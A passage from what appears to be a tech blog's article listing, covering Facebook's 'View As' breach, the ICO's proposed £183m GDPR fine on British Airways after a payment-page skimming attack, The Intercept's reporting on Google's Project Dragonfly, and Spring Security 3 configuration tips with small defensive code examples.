It originated from a change made to Facebook’s video uploading feature in July 2017, which impacted “View As.” Facebook says that the affected users will get a message at the top of their News Feed about the issue when they log back into the social network. The message reads, "Your privacy and security are important to us. We want to let you know about recent action we've taken to secure your account." The message is followed by a prompt to click and learn more details. Facebook has also publicly apologized, stating: “People’s privacy and security is incredibly important, and we’re sorry this happened. It’s why we’ve taken immediate action to secure these accounts and let users know what happened.” This is not the end of misery for Facebook. Some users have also tweeted that they were unable to post Facebook’s security breach coverage from The Guardian and Associated Press. When trying to share the story to their news feed, they were met with an error message that prevented them from doing so. The error reads, “Our security systems have detected that a lot of people are posting the same content, which could mean that it’s spam. Please try a different post.” People have criticized Facebook’s automated content flagging tools: this is an example of how they tag legitimate content as illegitimate, calling it spam. They have also previously failed to detect harassment and hate speech. However, according to updates on Facebook’s Twitter account, the bug has now been resolved. https://twitter.com/facebook/status/1045796897506516992 The security breach comes at a time when the social media company is already facing multiple criticisms over issues such as foreign election interference, misinformation and hate speech, and data privacy. Recently, an indie Taiwanese hacker also gained popularity with his plan to take down Mark Zuckerberg’s Facebook page and broadcast it live.
However, soon he grew cold feet and said he’ll refrain from doing so after receiving global attention following his announcement. "I am canceling my live feed, I have reported the bug to Facebook and I will show proof when I get a bounty from Facebook," he told Bloomberg News. It’s high time that Facebook began taking its users’ privacy seriously, perhaps even going as far as rethinking its algorithm and platform entirely. It should also take responsibility for the real-world consequences of actions enabled by Facebook. How far will Facebook go to fix what it broke: Democracy, Trust, Reality. WhatsApp co-founder reveals why he left Facebook; is called ‘low class’ by a Facebook senior executive. Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma

Sugandha Lahoti
08 Jul 2019
6 min read

British Airways set to face a record-breaking fine of £183m by the ICO over customer data breach

The UK’s watchdog, the ICO, is all set to fine British Airways more than £183m over a customer data breach. In September last year, British Airways notified the ICO about a data breach that compromised personal identification information of over 500,000 customers and is believed to have begun in June 2018. The ICO said in a statement, “Following an extensive investigation, the ICO has issued a notice of its intention to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR).” Information Commissioner Elizabeth Denham said, "People's personal data is just that - personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That's why the law is clear - when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights."

How did the data breach occur?

According to the details provided on the British Airways website, payments through its main website and mobile app were affected from 22:58 BST August 21, 2018, until 21:45 BST September 5, 2018. Per the ICO’s investigation, user traffic from the British Airways site was being directed to a fraudulent site, from where customer details were harvested by the attackers. Personal information compromised included log-in, payment card, and travel booking details, as well as name and address information. This was what is known as a supply chain attack: websites embed code from third-party suppliers to run payment authorisation, present ads, allow users to log into external services, and so on, and an attacker who compromises that code compromises the site. According to a cyber-security expert, Prof Alan Woodward of the University of Surrey, the British Airways hack may have been the work of a company insider who tampered with the website and app's code for malicious purposes. He also pointed out that live data was harvested on the site rather than stored data.
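As context (not something the ICO notice discusses), a standard defence against tampered third-party scripts of exactly this kind is Subresource Integrity (SRI): the page pins a hash of the expected script, and the browser refuses to run a file whose content no longer matches. The integrity value can be computed with nothing but the standard library; this is an illustrative sketch:

```python
import base64
import hashlib

def sri_hash(script_bytes):
    """Compute an SRI integrity value (sha384 is the commonly
    recommended strength) over a script's exact byte content."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

# The value goes into the script tag's integrity attribute, e.g.:
#   <script src="https://example.com/pay.js"
#           integrity="sha384-..." crossorigin="anonymous"></script>
```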
https://twitter.com/EerkeBoiten/status/1148130739642413056 RiskIQ, a cyber security company based in San Francisco, linked the British Airways attack with the modus operandi of the threat group Magecart. Magecart injects scripts designed to steal sensitive data that consumers enter into online payment forms on e-commerce websites, either directly or through compromised third-party suppliers. Per RiskIQ, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and to avoid detection for as long as possible.

What happens next for British Airways?

The ICO noted that British Airways cooperated with its investigation and has made security improvements since the breach was discovered. The airline now has 28 days to appeal. Responding to the news, British Airways’ chairman and chief executive Alex Cruz said that the company was “surprised and disappointed” by the ICO’s decision, and added that the company has found no evidence of fraudulent activity on accounts linked to the breach. He said, "British Airways responded quickly to a criminal act to steal customers' data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused." The ICO was appointed as the lead supervisory authority to tackle this case on behalf of other EU Member State data protection authorities. Under the GDPR’s ‘one stop shop’ provisions, the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO’s findings. The penalty is divided up between the other European data authorities, while the money that comes to the ICO goes directly to the Treasury. What is somewhat surprising is that the ICO disclosed the fine publicly even before the other supervisory authorities had commented on its findings and a final decision had been taken based on their feedback, as pointed out by Simon Hania.
https://twitter.com/simonhania/status/1148145570961399808

Record-breaking fine appreciated by experts

The penalty imposed on British Airways is the first one to be made public since the GDPR’s new data privacy rules were introduced. The GDPR makes it mandatory to report data security breaches to the information commissioner, and it increased the maximum penalty to 4% of the penalized company’s turnover. The fine would be the largest the ICO has ever issued; its previous record was the £500,000 fine levied on Facebook for the Cambridge Analytica scandal, which was the maximum under the 1998 Data Protection Act. The British Airways penalty amounts to 1.5% of its worldwide turnover in 2017, making it roughly 367 times Facebook’s. In fact, it could have been even worse had the maximum penalty been levied; the full 4% of turnover would have meant a fine approaching £500m. Such a massive fine clearly sends a shudder down the spine of any big corporation responsible for handling cybersecurity - if they compromise customers' data, a severe punishment is in order. https://twitter.com/j_opdenakker/status/1148145361799798785 Carl Gottlieb, Privacy Lead & Data Protection Officer at Duolingo, summarized the key points in a much-appreciated Twitter thread: GDPR fines are for inappropriate security as opposed to getting breached. Breaches are a good pointer but are not themselves actionable. So organisations need to implement security that is appropriate for their size, means, risk and need. Security is an organisation's responsibility, whether you host IT yourself, outsource it or rely on someone else not getting hacked. The GDPR has teeth against anyone that messes up security, but clearly action will be greatest where the human impact is most significant. Threats of GDPR fines are what created change in privacy and security practices over the last 2 years (not orgs suddenly growing a conscience).
And with very few fines so far, improvements have slowed; this will help. Monetary fines are a great example to change behaviour in others, but a TERRIBLE punishment to drive change in an affected organisation. Other enforcement measures, e.g. ceasing the processing of personal data (such as banning new signups), would be much more impactful. https://twitter.com/CarlGottlieb/status/1148119665257963521 Facebook fined $2.3 million by Germany for providing incomplete information about hate speech content European Union fined Google 1.49 billion euros for antitrust violations in online advertising French data regulator, CNIL imposes a fine of 50M euros against Google for failing to comply with GDPR.
Sugandha Lahoti
30 Nov 2018
5 min read

Google bypassed its own security and privacy teams for Project Dragonfly reveals Intercept

Google’s Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, the Intercept revealed how internal conversations around Google’s censored search engine for China shut out Google’s legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, company executives appeared intent on watering down the privacy review. Google bosses also worked to suppress employee criticism of the censored search engine. Project Dragonfly is the secretive search engine that Google is allegedly developing to comply with Chinese censorship rules. It was kept secret from the company at large during the 18 months it was in development, until an insider leak led to its existence being revealed in The Intercept. It has been on the receiving end of constant backlash from various human rights organizations and investigative reporters ever since. Earlier this week, it faced criticism from the human rights organization Amnesty International, followed by Google employees signing a petition protesting Project Dragonfly.

The secretive way Google operated Dragonfly

The majority of the leaks came from Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google’s top executive for China and Korea. According to Zunger, Beaumont “wanted [the privacy review of Dragonfly] to be pro forma and thought it should defer entirely to his views of what the product ought to be.
He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm.” Beaumont also micromanaged the project and ensured that discussions about Dragonfly, and access to documents about it, were under his tight control. If members of the Dragonfly team broke the strict confidentiality rules, their contracts at Google could be terminated.

Privacy report by Zunger

In the midst of all these constraints, Zunger and his team were still able to produce a privacy report. The report mentioned problematic scenarios that could arise if the search engine were launched in China: it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger’s meetings with the company’s senior leadership to discuss the privacy report were repeatedly postponed. Zunger said, “When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us.”

Dragonfly: Not just an experiment

The Intercept’s report even demolished Sundar Pichai’s recent public statement on Dragonfly, in which he described it as “just an experiment,” adding that it remained unclear whether the company “would or could” eventually launch it in China. Google employees were surprised, as they were told to prepare the search engine for launch between January and April 2019, or sooner. “What Pichai said [about Dragonfly being an experiment] was ultimately horse shit,” said one Google source with knowledge of the project. “This was run with 100 percent intention of launch from day one.
He was just trying to walk back a delicate political situation.” It is also alleged that Beaumont had intended from day one that the project should only become known once it had launched. “He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly,” one Google source told the Intercept. This makes us wonder about the extent to which Google is really concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company that simply prioritizes growth and expansion into new markets, even if it means compromising on issues like internet censorship and surveillance. Perhaps we shouldn’t be surprised. Google CEO Sundar Pichai is expected to testify in Congress on Dec. 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China. Public opinion on the Intercept’s report is largely supportive. https://twitter.com/DennGordon/status/1068228199149125634 https://twitter.com/mpjme/status/1068268991238541312 https://twitter.com/cynthiamw/status/1068240969990983680 Google employee and inclusion activist Liz Fong-Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest. https://twitter.com/lizthegrey/status/1068212346236096513 She has also shown full support for Zunger. https://twitter.com/lizthegrey/status/1068209548320747521 Google employees join hands with Amnesty International urging Google to drop Project Dragonfly OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly? Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly.

Packt
28 Feb 2011
6 min read

Spring Security 3: Tips and Tricks

Spring Security 3. Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full with concrete, simple, and concise examples.

It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it'll disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.

Evaluating authorization rules

Tip: For any given URL request, Spring Security evaluates authorization rules in top-to-bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered from most specific to least specific. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top-to-bottom order, and you can easily find the correct rule in any scenario!

Using the JSTL URL tag to handle relative URLs

Tip: Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!
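The top-to-bottom, first-match behaviour described in the authorization-rules tip can be modelled in a few lines. This is only an illustrative sketch (simplified prefix matching standing in for Ant-style patterns), not Spring Security's actual implementation:

```python
def first_matching_rule(url, rules):
    """Scan rules top to bottom and return the access attribute of
    the first pattern that matches; later rules are never consulted."""
    for pattern, access in rules:
        # Crude stand-in for Ant-style matching: "/admin/**" -> "/admin"
        prefix = pattern[:-3] if pattern.endswith("/**") else pattern
        if url.startswith(prefix):
            return access
    return None

# Most-specific rules first, catch-all last:
rules = [("/admin/**", "ROLE_ADMIN"), ("/**", "ROLE_USER")]

# If the catch-all came first, "/admin/users" would match it and the
# ROLE_ADMIN rule would never take effect:
bad_order = [("/**", "ROLE_USER"), ("/admin/**", "ROLE_ADMIN")]
```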
Modifying username or password and the remember me feature

Tip: You may have anticipated that if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.

Configuration of remember me session cookies

Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!

Checking Full Authentication without Expressions

Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_AUTHENTICATED_FULLY access rule (for example, access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.

Debugging remember me cookies

Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)
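The decoding step from the last tip can also be done offline in a couple of lines; this sketch simply restores the stripped '=' padding the tip mentions before decoding (illustrative only, the sample token content is made up):

```python
import base64

def decode_remember_me_cookie(cookie_value):
    """Base64-decode a remember-me cookie value, restoring any
    '=' padding that was stripped from the end of the string."""
    padding = "=" * (-len(cookie_value) % 4)
    return base64.b64decode(cookie_value + padding).decode("utf-8")

# A token of the general username:expiry:signature shape, with its
# trailing padding removed, as often seen in the browser:
token = base64.b64encode(b"admin:1291231200000:signature").decode().rstrip("=")
```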
Making effective use of an in-memory UserDetailsService

Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context needed to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.

Storing sensitive information

Tip: Many guidelines that apply to the storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

Annotations at the class level

Tip: Be aware that method-level security annotations can also be applied at the class level! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate the specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.

Authenticating the user against LDAP

Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService if you are intending to authenticate the user against LDAP itself!
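The in-memory UserDetailsService tip above can be sketched with the security namespace's user-service element; the user names, passwords, and roles here are illustrative test fixtures:

```xml
<!-- A hard-coded user store suitable for unit and integration tests -->
<user-service id="testUserDetailsService">
    <user name="testuser" password="testpass" authorities="ROLE_USER"/>
    <user name="testadmin" password="testpass"
          authorities="ROLE_USER,ROLE_ADMIN"/>
</user-service>
```

Because the users and their GrantedAuthority values are fixed in configuration, a test can exercise both an ordinary user and an administrator without any external user store.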
Externalize URLs and environment-dependent settings

Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage of and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice.

Summary

In this article we took a look at some of the tips and tricks for Spring Security.

Further resources on this subject:

Spring Security 3 [Book]
Migration to Spring Security 3 [Article]
Opening up to OpenID with Spring Security [Article]
Spring Security: Configuring Secure Passwords [Article]
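Returning to the tip on externalizing environment-dependent settings, here is a minimal sketch using PropertyPlaceholderConfigurer; the properties file name and the ldap.server.url key are hypothetical:

```xml
<!-- environment.properties, kept outside the Spring configuration files:
     ldap.server.url=ldap://localhost:33389/dc=example,dc=com -->
<bean class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer">
    <property name="location" value="classpath:environment.properties"/>
</bean>

<!-- The placeholder is resolved at startup, so each environment can
     supply its own properties file without touching this XML -->
<ldap-server url="${ldap.server.url}"/>
```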